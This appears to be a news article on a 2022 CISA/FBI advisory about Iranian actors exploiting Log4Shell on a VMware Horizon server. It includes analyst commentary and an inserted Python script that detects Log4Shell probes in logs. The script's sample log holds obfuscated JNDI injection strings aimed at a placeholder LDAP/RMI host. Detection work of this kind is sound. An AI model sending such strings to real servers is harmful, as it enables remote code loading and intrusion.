
CISA and FBI release joint advisory on Iranian threat activity.

November 17, 2022 – Published on The Cyberwire

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint cybersecurity advisory yesterday on Iranian government-sponsored APT actors compromising a federal network.

Exploitation of well-known vulnerability.

CyberScoop reports that threat actors linked to the Iranian government hacked into a US government agency’s network at the beginning of this year. The hackers used the well-known Log4Shell vulnerability to infiltrate a VMware Horizon server in February and then move across the network. Bleeping Computer reports that the hackers deployed a cryptocurrency miner, as well as reverse proxies on compromised servers, to maintain their foothold in the network.

Hunting for compromise.

Security Week reports that CISA and the FBI published indicators of compromise (IOCs) to help potentially affected organizations find infections, working from the assumption that a compromise has already occurred. The agencies said in the advisory, “All organizations with affected VMware systems that did not immediately apply available patches or workarounds [should] assume compromise and initiate threat hunting activities.” If signs of compromise are found, connected systems should be investigated and privileged accounts should be audited.
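As an added illustration of the threat hunting the advisory calls for (this is example code written here, not from the advisory or from CISA), the following script sweeps constructed web-access log lines for Log4Shell lookup strings, including the nested `${lower:...}` and `${::-...}` forms used to disguise them, and lists the client addresses whose connected systems would need follow-up. The log format and IP addresses are assumptions chosen for the example.

```python
import re
from typing import List, Set, Tuple

# Constructed sample lines in a Tomcat-style access log format (not real data):
# the User-Agent field is a common place for Log4Shell probes to land in logs.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [12/Feb/2022:03:14:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.10:1389/b}"
10.0.0.9 - - [12/Feb/2022:03:14:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/c}"
10.0.0.7 - - [12/Feb/2022:03:15:00 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "VMware-client"
"""

# Nested lookups that resolve to a single character: ${lower:j}, ${upper:J}, ${::-j}
_NESTED = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{::-([^{}]*)\}", re.IGNORECASE)
# A JNDI lookup with one of the protocols Log4j 2 would resolve
_JNDI = re.compile(r"\$\{\s*jndi:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups until a fixed point, then lowercase."""
    for _ in range(max_rounds):
        new = _NESTED.sub(lambda m: m.group(1) or m.group(2) or "", line)
        if new == line:
            break
        line = new
    return line.lower()


def find_log4shell_probes(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, protocol, original line) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


def suspect_sources(hits: List[Tuple[int, str, str]]) -> Set[str]:
    """Client addresses that sent probes; the systems behind them warrant investigation."""
    return {line.split(" ", 1)[0] for _, _, line in hits}


if __name__ == "__main__":
    found = find_log4shell_probes(SAMPLE_LOG)
    for number, proto, line in found:
        print(f"line {number}: jndi via {proto}: {line}")
    print("sources to investigate:", sorted(suspect_sources(found)))
```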

Attribution to Nemesis Kitten.

Nic Finn, Threat Intelligence Consultant at GuidePoint Security, offered some context on Nemesis Kitten’s track record:

“Microsoft recently released a threat profile on DEV-0270 (Nemesis Kitten) which described a potential for Nemesis Kitten actors to moonlight for personal profit. Nemesis Kitten has been observed conducting crypto-mining and ransomware attacks for quite some time in order to increase revenue for the Iranian regime. Additionally, these hackers have been observed attempting to impact the US Presidential election, with multiple indictments for attempting to influence the 2020 election by hacking into voter websites, disseminating fake videos alleging voter fraud, and threatening voters.”

Update: Risks of laggard patching.

Nic Finn, of GuidePoint Security, observes that the incident shows a shortfall in vulnerability management practices:

“This clearly shows that organizations, even including federal agencies, are failing to maintain strong vulnerability management processes. There are over 13,000 US-based servers hosting VMware Horizon, according to Shodan data. It is a trivial process for an actor with Nemesis Kitten’s resources to attempt to exploit this vulnerability against those servers. Even a 1% vulnerability rate still indicates 130 vulnerable servers. Organizations need to establish thorough Attack Surface Monitoring processes and regularly check for vulnerable services across their servers.”

Update: Why cryptojacking?

GuidePoint Security’s Nic Finn offered some observations about the cryptojacking component of Nemesis Kitten’s operation:

“Nemesis Kitten has been using crypto-mining against victims for a long time. This is lucrative because they can expend manpower resources to gain access to victim networks, then collect crypto directly without the need to interact with victims for negotiations, as we see in ransomware engagements. Targeting of federal agencies isn’t particularly surprising, considering the amount of government agencies and the size of their networks. CISA has noted Iran-based cyber actors targeting federal agencies since at least September 2020. What’s noteworthy about CISA’s publication is that these targets are VMware Horizon servers, meaning there is the potential for significantly more resources to be expended, resulting in higher profits for Nemesis Kitten while potentially being harder to observe and impacting fewer hosts across a victim network.”
